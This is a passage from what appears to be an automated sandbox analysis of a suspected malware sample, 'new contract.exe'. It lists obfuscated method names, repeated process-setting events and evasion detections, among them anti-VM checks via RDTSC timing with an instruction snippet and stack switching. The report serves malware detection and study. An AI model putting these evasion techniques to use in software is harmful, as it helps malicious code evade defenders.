          Source: 0.2.new contract.exe.419def0.2.raw.unpack, AnPH1ZOKvPImGHJVl0j.csHigh entropy of concatenated method names: 'RCcH3scGmw', 'q5xHhRknv7', 'RIOHCUqrdO', 'Qh0HEYwQTV', 'VkKHnN3V5P', 'HH6HGjXqWU', 'liNHMDD4II', 'EwcH08fCoX', 'zCEHPVLjvv', 'rwYHw8TvBQ'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, fwA2K7BTejKMW9QUlG.csHigh entropy of concatenated method names: 'Qq4kLtvjhW', 'WtJkaxlmWT', 'B2WkAZDOhk', 'CxqkYGJIV6', 'JYFkBOQOrV', 't97AlKkZTO', 'Hj4AvGwvoY', 'WqqADNWdSO', 'QfgAQsOHNx', 'OjLAm3KyAJ'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, FgGUaas92i9EvJTkCy.csHigh entropy of concatenated method names: 'vVjoQVpX5s', 'C8poFeSSU0', 'g2yO8KaRGx', 'hcEO7rbR1Q', 'aCIoibJ0mf', 'bxootaQUfj', 'DyHoWwJTXW', 'cyto4uNumR', 'e20o1B8B7O', 'xW3oRVrtFL'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, OZjAZMZljeJfRcMEoc.csHigh entropy of concatenated method names: 'ObICTEYAi', 'O4fExnimc', 'cunGFxp3K', 'mcTM2YKpa', 'KogPXsH93', 'Y3ww4GSxf', 'CBEd6tAbdqUNqjg8ee', 'tJ3qr5N4cvKdWuy8m3', 'OOkOG436q', 'Bnq2i4aaJ'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, cxtTtGunxt5IjcA9tT.csHigh entropy of concatenated method names: 'R79OpiWflb', 'wxJOalib1K', 'TeeOuSohhM', 'iLnOAZ07T7', 'OjvOkRDY9N', 'ub5OYVAyjP', 'V1uOB1R9pR', 'TEYOUFybLl', 'xqtOIysPJm', 'iAWOdiEKSM'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, p7xNqEzxIiFeSoxNuY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a4gHNvH8qE', 'jpoHgrwLh0', 'nk5HSXwhke', 'A1jHojnBdT', 'OcaHOrdgXk', 'Da4HHgDP09', 'mCfH291rO2'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, fgEBeMUyhH7sZUUckO.csHigh entropy of concatenated method names: 'P53a4tNGPQ', 'QJLa1gleOS', 'QVRaRFxdt7', 'Cdxa59UVsr', 'bLSaluw5ed', 'JPAavJKSOf', 'UetaDvsP9X', 'yYYaQTDYbd', 'CTpam4JgxZ', 'cQDaFINaKP'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, zUws5HLCWDAIg0bvex.csHigh entropy of concatenated method names: 'B2m7YMurfq', 'CtG7BU1pCS', 'BVr7IBy4gq', 'EcM7djjGJ3', 'ITY7glNjID', 'OZ37SZnApN', 'RQHLujujtC9OjhZxtH', 'DH6bVA9jcjNSmwxDaO', 'lDG77EqoZH', 'MA67TBJpmh'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, nNEK9grHOYMabirkn9.csHigh entropy of concatenated method names: 'ujIoItZi25', 'SGGodoKJEL', 'ToString', 'rfOopVlZlm', 'KRxoavNDmw', 'hcrouVlpIW', 'THuoAg4jRl', 'h24ok8B1fG', 's46oY1JZR0', 'tMFoB1aDiS'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, fbgZAVOvkt4qOAMZfXo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLf24Ir8wS', 'NGK21E1qOX', 'RxZ2RSfmla', 'rFY25LrKK1', 'Vs12lZHDNb', 'Oqv2vBl4Pm', 'iVm2DFQKy2'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, UCFEImOOnS2ah0fT7nc.csHigh entropy of concatenated method names: 'ToString', 'KL72TGf78t', 'DZ52VkL8Af', 'JNM2LdqlLM', 'gnp2psu8UG', 'bce2aM0kH3', 'xbf2uOCuKA', 'vEl2AABmK1', 'sE7BOo1IqYogjtGB4KC', 'miSiqq1qGpFXkZNcdkF'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, J7QEFHaSxHRZs0TFi6.csHigh entropy of concatenated method names: 'jADH7uvKgG', 'ld0HTJ5aLB', 'NSUHVeSZWw', 'EKHHpxjwIN', 'IZPHaFFwsr', 'S8lHAtKT73', 'TD4HkDQMuR', 'ufhOD8HcxP', 'lePOQUHIV1', 'BaPOm3UsHC'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, aDjYvCEF62E4IZYMPn.csHigh entropy of concatenated method names: 'UL1N0O4gTW', 't09NPdXcXf', 'ctRNcyAufi', 'UhINXQmb4n', 'RqYNsIQR0T', 'AacNKVbLuc', 'RKXNJmwcNm', 'SpPNZYtvo6', 'judNxAZ15u', 'djSNiYt2OE'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, y5AhBBpbkCOrjXLQSY.csHigh entropy of concatenated method names: 'DqvYpIC0u9', 'OVxYuH61ux', 'EvkYkOKQZd', 'oeEkFYSIKM', 'pv1kz4KwAA', 'soAY89N83I', 'WPlY7IbfBE', 'edQYqsqiW2', 'kgSYTaxmvn', 'TOKYVXv6jQ'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, SQA3X2yg9UeEuDdc7y.csHigh entropy of concatenated method names: 'rSDuEJHf9M', 'wpOuGSOAvV', 'Tlru0y0hIu', 'pLBuPXtVcM', 's7Augqus3c', 'CaSuS1YTis', 'xYyuoF6iuu', 'UEduOTjQBp', 'MMguH079jO', 'aIhu2iid4o'
          Source: 0.2.new contract.exe.419def0.2.raw.unpack, el3wNP0WoRTZbNZSWq.csHigh entropy of concatenated method names: 'MRxDNSZaKKuO7aBnuSr', 'smJafGZQ9yBPJn5jG3F', 'WXoN05ZiRTBBLSGJUTr', 'NNmkONbAE7', 'Im1kHWj8do', 'ND9k25D4bi', 'CQ7VVrZ2m33H4UGXLOX', 'ea8GMeZHAWPYgAafnKV'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, SOwVvHMwinIr4CVPeB.csHigh entropy of concatenated method names: 'Dispose', 'aI87mJBnb1', 'jKSqXh431R', 'm6ebbuCEuC', 'vyY7F10NkP', 'y1M7z1kJdj', 'ProcessDialogKey', 'mV5q8Nbj4n', 'K0dq71HYwv', 'nigqq3REnx'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, uf9aokYYeocPIOSosy.csHigh entropy of concatenated method names: 'ekYAnEi5yt', 'g0kAMt1aRF', 'DEHuf1e4pw', 'UEMusKJwCK', 'ktHuKPGsns', 'R51u9myGsQ', 'KdkuJJqPRd', 'hhAuZSGJw2', 'IKcujRYdBA', 'tKIuxEF0Pj'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, QQTpKp75Qv0RWvQaoE.csHigh entropy of concatenated method names: 'UxEOcxTPdk', 'NRMOX6GNmV', 'VwiOfIUlWg', 'xBfOsgDlPW', 'ysoO4sQIdk', 'VJZOKaADJj', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BdAaLxlyFpvWDFdhFt.csHigh entropy of concatenated method names: 'xAQY3xZshw', 'HFmYh3i4mA', 'rKMYCGXLbN', 'Wy1YEoRtNZ', 'A4xYnnAa9B', 'k1BYGWcf2J', 'bjvYMw44ve', 'CKhY0diM9Y', 'XFLYPudrcb', 'gGgYw5EWNs'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, BOAIWHfAjJUfow6tuk.csHigh entropy of concatenated method names: 'Bt4TLdUcQu', 'NHiTpK9ow5', 'KLoTainbXn', 'UAfTuWPf6S', 'nbdTAqCCuH', 'YnuTkX58rc', 'ViXTYrwlcv', 'skSTBbWqr4', 'zLITURJXrC', 'MUsTIR6eRE'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, zEP9MvkRynobcNIcT7.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nM2qmOa6TN', 'RNrqF2inTm', 'PWeqzEgHDs', 'jluT8iXvyd', 'YrfT7E6FHA', 'rqCTqhgHJH', 'NkFTTqIebR', 'LpuL7NOyBiKZJDjlnug'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, nBjC5FWVGlwu26wPqR.csHigh entropy of concatenated method names: 'ToString', 'QReSiZuu4y', 'tCFSXZJvKP', 'FM7Sfjq6FD', 'zjWSsuVrCk', 'ycxSKIgBpu', 'E29S9TCIva', 'id8SJvdwbo', 'MFiSZXNZls', 'IiYSjmqc9h'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, AnPH1ZOKvPImGHJVl0j.csHigh entropy of concatenated method names: 'RCcH3scGmw', 'q5xHhRknv7', 'RIOHCUqrdO', 'Qh0HEYwQTV', 'VkKHnN3V5P', 'HH6HGjXqWU', 'liNHMDD4II', 'EwcH08fCoX', 'zCEHPVLjvv', 'rwYHw8TvBQ'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fwA2K7BTejKMW9QUlG.csHigh entropy of concatenated method names: 'Qq4kLtvjhW', 'WtJkaxlmWT', 'B2WkAZDOhk', 'CxqkYGJIV6', 'JYFkBOQOrV', 't97AlKkZTO', 'Hj4AvGwvoY', 'WqqADNWdSO', 'QfgAQsOHNx', 'OjLAm3KyAJ'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, FgGUaas92i9EvJTkCy.csHigh entropy of concatenated method names: 'vVjoQVpX5s', 'C8poFeSSU0', 'g2yO8KaRGx', 'hcEO7rbR1Q', 'aCIoibJ0mf', 'bxootaQUfj', 'DyHoWwJTXW', 'cyto4uNumR', 'e20o1B8B7O', 'xW3oRVrtFL'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, OZjAZMZljeJfRcMEoc.csHigh entropy of concatenated method names: 'ObICTEYAi', 'O4fExnimc', 'cunGFxp3K', 'mcTM2YKpa', 'KogPXsH93', 'Y3ww4GSxf', 'CBEd6tAbdqUNqjg8ee', 'tJ3qr5N4cvKdWuy8m3', 'OOkOG436q', 'Bnq2i4aaJ'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, cxtTtGunxt5IjcA9tT.csHigh entropy of concatenated method names: 'R79OpiWflb', 'wxJOalib1K', 'TeeOuSohhM', 'iLnOAZ07T7', 'OjvOkRDY9N', 'ub5OYVAyjP', 'V1uOB1R9pR', 'TEYOUFybLl', 'xqtOIysPJm', 'iAWOdiEKSM'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, p7xNqEzxIiFeSoxNuY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a4gHNvH8qE', 'jpoHgrwLh0', 'nk5HSXwhke', 'A1jHojnBdT', 'OcaHOrdgXk', 'Da4HHgDP09', 'mCfH291rO2'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fgEBeMUyhH7sZUUckO.csHigh entropy of concatenated method names: 'P53a4tNGPQ', 'QJLa1gleOS', 'QVRaRFxdt7', 'Cdxa59UVsr', 'bLSaluw5ed', 'JPAavJKSOf', 'UetaDvsP9X', 'yYYaQTDYbd', 'CTpam4JgxZ', 'cQDaFINaKP'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, zUws5HLCWDAIg0bvex.csHigh entropy of concatenated method names: 'B2m7YMurfq', 'CtG7BU1pCS', 'BVr7IBy4gq', 'EcM7djjGJ3', 'ITY7glNjID', 'OZ37SZnApN', 'RQHLujujtC9OjhZxtH', 'DH6bVA9jcjNSmwxDaO', 'lDG77EqoZH', 'MA67TBJpmh'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, nNEK9grHOYMabirkn9.csHigh entropy of concatenated method names: 'ujIoItZi25', 'SGGodoKJEL', 'ToString', 'rfOopVlZlm', 'KRxoavNDmw', 'hcrouVlpIW', 'THuoAg4jRl', 'h24ok8B1fG', 's46oY1JZR0', 'tMFoB1aDiS'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, fbgZAVOvkt4qOAMZfXo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLf24Ir8wS', 'NGK21E1qOX', 'RxZ2RSfmla', 'rFY25LrKK1', 'Vs12lZHDNb', 'Oqv2vBl4Pm', 'iVm2DFQKy2'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, UCFEImOOnS2ah0fT7nc.csHigh entropy of concatenated method names: 'ToString', 'KL72TGf78t', 'DZ52VkL8Af', 'JNM2LdqlLM', 'gnp2psu8UG', 'bce2aM0kH3', 'xbf2uOCuKA', 'vEl2AABmK1', 'sE7BOo1IqYogjtGB4KC', 'miSiqq1qGpFXkZNcdkF'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, J7QEFHaSxHRZs0TFi6.csHigh entropy of concatenated method names: 'jADH7uvKgG', 'ld0HTJ5aLB', 'NSUHVeSZWw', 'EKHHpxjwIN', 'IZPHaFFwsr', 'S8lHAtKT73', 'TD4HkDQMuR', 'ufhOD8HcxP', 'lePOQUHIV1', 'BaPOm3UsHC'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, aDjYvCEF62E4IZYMPn.csHigh entropy of concatenated method names: 'UL1N0O4gTW', 't09NPdXcXf', 'ctRNcyAufi', 'UhINXQmb4n', 'RqYNsIQR0T', 'AacNKVbLuc', 'RKXNJmwcNm', 'SpPNZYtvo6', 'judNxAZ15u', 'djSNiYt2OE'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, y5AhBBpbkCOrjXLQSY.csHigh entropy of concatenated method names: 'DqvYpIC0u9', 'OVxYuH61ux', 'EvkYkOKQZd', 'oeEkFYSIKM', 'pv1kz4KwAA', 'soAY89N83I', 'WPlY7IbfBE', 'edQYqsqiW2', 'kgSYTaxmvn', 'TOKYVXv6jQ'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, SQA3X2yg9UeEuDdc7y.csHigh entropy of concatenated method names: 'rSDuEJHf9M', 'wpOuGSOAvV', 'Tlru0y0hIu', 'pLBuPXtVcM', 's7Augqus3c', 'CaSuS1YTis', 'xYyuoF6iuu', 'UEduOTjQBp', 'MMguH079jO', 'aIhu2iid4o'
          Source: 0.2.new contract.exe.8e80000.5.raw.unpack, el3wNP0WoRTZbNZSWq.csHigh entropy of concatenated method names: 'MRxDNSZaKKuO7aBnuSr', 'smJafGZQ9yBPJn5jG3F', 'WXoN05ZiRTBBLSGJUTr', 'NNmkONbAE7', 'Im1kHWj8do', 'ND9k25D4bi', 'CQ7VVrZ2m33H4UGXLOX', 'ea8GMeZHAWPYgAafnKV'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, SOwVvHMwinIr4CVPeB.csHigh entropy of concatenated method names: 'Dispose', 'aI87mJBnb1', 'jKSqXh431R', 'm6ebbuCEuC', 'vyY7F10NkP', 'y1M7z1kJdj', 'ProcessDialogKey', 'mV5q8Nbj4n', 'K0dq71HYwv', 'nigqq3REnx'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, uf9aokYYeocPIOSosy.csHigh entropy of concatenated method names: 'ekYAnEi5yt', 'g0kAMt1aRF', 'DEHuf1e4pw', 'UEMusKJwCK', 'ktHuKPGsns', 'R51u9myGsQ', 'KdkuJJqPRd', 'hhAuZSGJw2', 'IKcujRYdBA', 'tKIuxEF0Pj'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, QQTpKp75Qv0RWvQaoE.csHigh entropy of concatenated method names: 'UxEOcxTPdk', 'NRMOX6GNmV', 'VwiOfIUlWg', 'xBfOsgDlPW', 'ysoO4sQIdk', 'VJZOKaADJj', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BdAaLxlyFpvWDFdhFt.csHigh entropy of concatenated method names: 'xAQY3xZshw', 'HFmYh3i4mA', 'rKMYCGXLbN', 'Wy1YEoRtNZ', 'A4xYnnAa9B', 'k1BYGWcf2J', 'bjvYMw44ve', 'CKhY0diM9Y', 'XFLYPudrcb', 'gGgYw5EWNs'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, BOAIWHfAjJUfow6tuk.csHigh entropy of concatenated method names: 'Bt4TLdUcQu', 'NHiTpK9ow5', 'KLoTainbXn', 'UAfTuWPf6S', 'nbdTAqCCuH', 'YnuTkX58rc', 'ViXTYrwlcv', 'skSTBbWqr4', 'zLITURJXrC', 'MUsTIR6eRE'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, zEP9MvkRynobcNIcT7.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'nM2qmOa6TN', 'RNrqF2inTm', 'PWeqzEgHDs', 'jluT8iXvyd', 'YrfT7E6FHA', 'rqCTqhgHJH', 'NkFTTqIebR', 'LpuL7NOyBiKZJDjlnug'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, nBjC5FWVGlwu26wPqR.csHigh entropy of concatenated method names: 'ToString', 'QReSiZuu4y', 'tCFSXZJvKP', 'FM7Sfjq6FD', 'zjWSsuVrCk', 'ycxSKIgBpu', 'E29S9TCIva', 'id8SJvdwbo', 'MFiSZXNZls', 'IiYSjmqc9h'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, AnPH1ZOKvPImGHJVl0j.csHigh entropy of concatenated method names: 'RCcH3scGmw', 'q5xHhRknv7', 'RIOHCUqrdO', 'Qh0HEYwQTV', 'VkKHnN3V5P', 'HH6HGjXqWU', 'liNHMDD4II', 'EwcH08fCoX', 'zCEHPVLjvv', 'rwYHw8TvBQ'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fwA2K7BTejKMW9QUlG.csHigh entropy of concatenated method names: 'Qq4kLtvjhW', 'WtJkaxlmWT', 'B2WkAZDOhk', 'CxqkYGJIV6', 'JYFkBOQOrV', 't97AlKkZTO', 'Hj4AvGwvoY', 'WqqADNWdSO', 'QfgAQsOHNx', 'OjLAm3KyAJ'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, FgGUaas92i9EvJTkCy.csHigh entropy of concatenated method names: 'vVjoQVpX5s', 'C8poFeSSU0', 'g2yO8KaRGx', 'hcEO7rbR1Q', 'aCIoibJ0mf', 'bxootaQUfj', 'DyHoWwJTXW', 'cyto4uNumR', 'e20o1B8B7O', 'xW3oRVrtFL'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, OZjAZMZljeJfRcMEoc.csHigh entropy of concatenated method names: 'ObICTEYAi', 'O4fExnimc', 'cunGFxp3K', 'mcTM2YKpa', 'KogPXsH93', 'Y3ww4GSxf', 'CBEd6tAbdqUNqjg8ee', 'tJ3qr5N4cvKdWuy8m3', 'OOkOG436q', 'Bnq2i4aaJ'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, cxtTtGunxt5IjcA9tT.csHigh entropy of concatenated method names: 'R79OpiWflb', 'wxJOalib1K', 'TeeOuSohhM', 'iLnOAZ07T7', 'OjvOkRDY9N', 'ub5OYVAyjP', 'V1uOB1R9pR', 'TEYOUFybLl', 'xqtOIysPJm', 'iAWOdiEKSM'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, p7xNqEzxIiFeSoxNuY.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'a4gHNvH8qE', 'jpoHgrwLh0', 'nk5HSXwhke', 'A1jHojnBdT', 'OcaHOrdgXk', 'Da4HHgDP09', 'mCfH291rO2'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fgEBeMUyhH7sZUUckO.csHigh entropy of concatenated method names: 'P53a4tNGPQ', 'QJLa1gleOS', 'QVRaRFxdt7', 'Cdxa59UVsr', 'bLSaluw5ed', 'JPAavJKSOf', 'UetaDvsP9X', 'yYYaQTDYbd', 'CTpam4JgxZ', 'cQDaFINaKP'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, zUws5HLCWDAIg0bvex.csHigh entropy of concatenated method names: 'B2m7YMurfq', 'CtG7BU1pCS', 'BVr7IBy4gq', 'EcM7djjGJ3', 'ITY7glNjID', 'OZ37SZnApN', 'RQHLujujtC9OjhZxtH', 'DH6bVA9jcjNSmwxDaO', 'lDG77EqoZH', 'MA67TBJpmh'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, nNEK9grHOYMabirkn9.csHigh entropy of concatenated method names: 'ujIoItZi25', 'SGGodoKJEL', 'ToString', 'rfOopVlZlm', 'KRxoavNDmw', 'hcrouVlpIW', 'THuoAg4jRl', 'h24ok8B1fG', 's46oY1JZR0', 'tMFoB1aDiS'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, fbgZAVOvkt4qOAMZfXo.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qLf24Ir8wS', 'NGK21E1qOX', 'RxZ2RSfmla', 'rFY25LrKK1', 'Vs12lZHDNb', 'Oqv2vBl4Pm', 'iVm2DFQKy2'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, UCFEImOOnS2ah0fT7nc.csHigh entropy of concatenated method names: 'ToString', 'KL72TGf78t', 'DZ52VkL8Af', 'JNM2LdqlLM', 'gnp2psu8UG', 'bce2aM0kH3', 'xbf2uOCuKA', 'vEl2AABmK1', 'sE7BOo1IqYogjtGB4KC', 'miSiqq1qGpFXkZNcdkF'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, J7QEFHaSxHRZs0TFi6.csHigh entropy of concatenated method names: 'jADH7uvKgG', 'ld0HTJ5aLB', 'NSUHVeSZWw', 'EKHHpxjwIN', 'IZPHaFFwsr', 'S8lHAtKT73', 'TD4HkDQMuR', 'ufhOD8HcxP', 'lePOQUHIV1', 'BaPOm3UsHC'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, aDjYvCEF62E4IZYMPn.csHigh entropy of concatenated method names: 'UL1N0O4gTW', 't09NPdXcXf', 'ctRNcyAufi', 'UhINXQmb4n', 'RqYNsIQR0T', 'AacNKVbLuc', 'RKXNJmwcNm', 'SpPNZYtvo6', 'judNxAZ15u', 'djSNiYt2OE'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, y5AhBBpbkCOrjXLQSY.csHigh entropy of concatenated method names: 'DqvYpIC0u9', 'OVxYuH61ux', 'EvkYkOKQZd', 'oeEkFYSIKM', 'pv1kz4KwAA', 'soAY89N83I', 'WPlY7IbfBE', 'edQYqsqiW2', 'kgSYTaxmvn', 'TOKYVXv6jQ'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, SQA3X2yg9UeEuDdc7y.csHigh entropy of concatenated method names: 'rSDuEJHf9M', 'wpOuGSOAvV', 'Tlru0y0hIu', 'pLBuPXtVcM', 's7Augqus3c', 'CaSuS1YTis', 'xYyuoF6iuu', 'UEduOTjQBp', 'MMguH079jO', 'aIhu2iid4o'
          Source: 0.2.new contract.exe.412ded0.3.raw.unpack, el3wNP0WoRTZbNZSWq.csHigh entropy of concatenated method names: 'MRxDNSZaKKuO7aBnuSr', 'smJafGZQ9yBPJn5jG3F', 'WXoN05ZiRTBBLSGJUTr', 'NNmkONbAE7', 'Im1kHWj8do', 'ND9k25D4bi', 'CQ7VVrZ2m33H4UGXLOX', 'ea8GMeZHAWPYgAafnKV'
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: new contract.exe PID: 7424, type: MEMORYSTR
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\new contract.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Users\user\Desktop\new contract.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Users\user\Desktop\new contract.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Users\user\Desktop\new contract.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Users\user\Desktop\new contract.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\new contract.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\new contract.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\new contract.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
